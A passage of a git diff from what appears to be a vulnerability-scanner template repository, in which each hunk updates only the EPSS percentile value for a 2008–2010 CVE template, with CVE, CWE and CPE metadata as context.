cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 2b36d31fe4..3112611597 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.69953 + epss-percentile: 0.6998 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 281e7f45e5..aa5093372f 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-7269 cwe-id: CWE-20 epss-score: 0.01358 - epss-percentile: 0.84747 + epss-percentile: 0.84754 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 7b8b045377..0b469398f1 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-0347 cwe-id: CWE-59 epss-score: 0.10982 - epss-percentile: 0.94502 + epss-percentile: 0.94506 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index ab0d500196..4ee81118a3 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.91094 + epss-percentile: 0.91099 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 9dc67c629e..1a428fd37a 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1151 cwe-id: CWE-94 epss-score: 0.79256 - epss-percentile: 0.97929 + epss-percentile: 0.97931 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 20e3b5209a..70a07b000a 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.77046 + epss-percentile: 0.77067 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index cd16c8e800..1b0de985f6 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1558 cwe-id: CWE-22 epss-score: 0.00883 - epss-percentile: 0.80734 + epss-percentile: 0.80747 cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 4ff5ece06f..d01216792d 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-1872 cwe-id: CWE-79 epss-score: 0.40155 - epss-percentile: 0.96856 + epss-percentile: 0.96858 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index ecc7a35dd4..1bc1fe8bdb 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-2015 cwe-id: CWE-22 epss-score: 0.00797 - epss-percentile: 0.797 + epss-percentile: 0.79711 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index a8d7d83436..cb81070282 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2009-2100 cwe-id: CWE-22 epss-score: 0.00528 - epss-percentile: 0.74412 + epss-percentile: 0.7444 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 174b830404..4f0ea80d8e 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-3053 cwe-id: CWE-22 epss-score: 0.00367 - epss-percentile: 0.6946 + epss-percentile: 0.69485 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index eecf2b9026..4710f32d3d 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-3318 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78213 + epss-percentile: 0.78226 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index e018c55d26..c07df35388 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4202 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87408 + epss-percentile: 0.87415 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 2b93ba8214..2c50180913 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.01041 - epss-percentile: 0.82323 + epss-percentile: 0.82334 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index b96b21605a..0da791d836 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4679 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index e8d85804f6..1320265647 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2009-5020 cwe-id: CWE-20 epss-score: 0.00215 - epss-percentile: 0.59359 + epss-percentile: 0.59391 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index f80fde20b7..d78dab08f2 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-5114 cwe-id: CWE-22 epss-score: 0.02357 - epss-percentile: 0.88611 + epss-percentile: 0.88616 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index fa7937e51f..3a7d7101eb 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-0157 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 4323a9147b..db22560e6c 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-0219 cwe-id: CWE-255 epss-score: 0.975 - epss-percentile: 0.99974 + epss-percentile: 0.99973 cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 8b728c38fb..c3f439296a 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - epss-percentile: 0.92582 + epss-percentile: 0.92587 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index cc4786d008..0ffe163961 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0696 cwe-id: CWE-22 epss-score: 0.62698 - epss-percentile: 0.97465 + epss-percentile: 0.97467 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index ee9e1b4fd1..1c9fe84680 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01326 - epss-percentile: 0.84549 + epss-percentile: 0.84556 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index cdb15171db..6d8282af36 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index fe35fd007a..d2e414c18e 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0943 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83288 + epss-percentile: 0.83297 cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index d308b2daba..0d165a5d4a 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 1d43bf2cdf..e7346d49c1 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79894 + epss-percentile: 0.79905 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 7daba69bd3..3f1b288c7e 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80556 + epss-percentile: 0.8057 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 0d43b56b3f..21223a826b 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83814 + epss-percentile: 0.83822 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 13ee08cdd5..26dfa75d81 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.06484 - epss-percentile: 0.92944 + epss-percentile: 0.92949 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index f496b00ba0..918fde6fec 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1081 cwe-id: CWE-22 epss-score: 0.0168 - epss-percentile: 0.86286 + epss-percentile: 0.8629 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index e9034b4fcb..dc362698d2 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83288 + epss-percentile: 0.83297 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 33d1581863..d604dd3222 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79894 + epss-percentile: 0.79905 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 2b0ac9857d..1f4ff11856 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1302 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83685 + epss-percentile: 0.83694 cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index cbfa5aa4f6..bf8bd677d3 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72298 + epss-percentile: 0.72322 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index db9d0d2a76..90d5b6ce02 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - epss-percentile: 0.90103 + epss-percentile: 0.90107 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 1a94e6c674..8763eab003 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83977 + epss-percentile: 0.83986 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 7cec697569..2bfd98223a 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.8657 + epss-percentile: 0.86574 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 82b7d82a8d..3adfacf0f3 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.84582 + epss-percentile: 0.84589 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 32e01c4b6d..d71c2150f8 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83288 + epss-percentile: 0.83297 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index bd84d68244..59ad85588d 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72298 + epss-percentile: 0.72322 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index f310a7157b..77b4a5ee58 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index d6e584bb47..9fdf9a0dda 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1315 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80556 + epss-percentile: 0.8057 cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index d09f1ed72e..fda03a8ec0 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1340 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83288 + epss-percentile: 0.83297 cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 2473459add..11776706ff 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1345 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index e59c8c652a..a600e3d207 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index fb335807de..710c43dded 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.8657 + epss-percentile: 0.86574 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 8885b3cc5e..e83850c109 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 3d6c39ed47..6271ec8d18 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1429 cwe-id: CWE-264 epss-score: 0.00573 - epss-percentile: 0.75475 + epss-percentile: 0.75498 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 70b75019a4..a993036e0c 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73076 + epss-percentile: 0.73105 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 613f3eccea..6fe3dd9eb1 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79894 + epss-percentile: 0.79905 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 022f4f0aff..7280dadb98 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.91626 + epss-percentile: 0.91636 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index eee57aa01d..37616c9695 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92484 + epss-percentile: 0.9249 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index d482ce32d4..479725f32e 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1472 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92484 + epss-percentile: 0.9249 cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index d80dbffec8..f49427dd63 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index ec97e95505..1b7536378b 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83977 + epss-percentile: 0.83986 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index c9dd453f34..a9780db27f 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83977 + epss-percentile: 0.83986 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index f392f2d60f..c5eaac8617 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90505 + epss-percentile: 0.90512 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 504bb0c274..d0a355f388 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -15,7 +15,7 @@ info: cve-id: 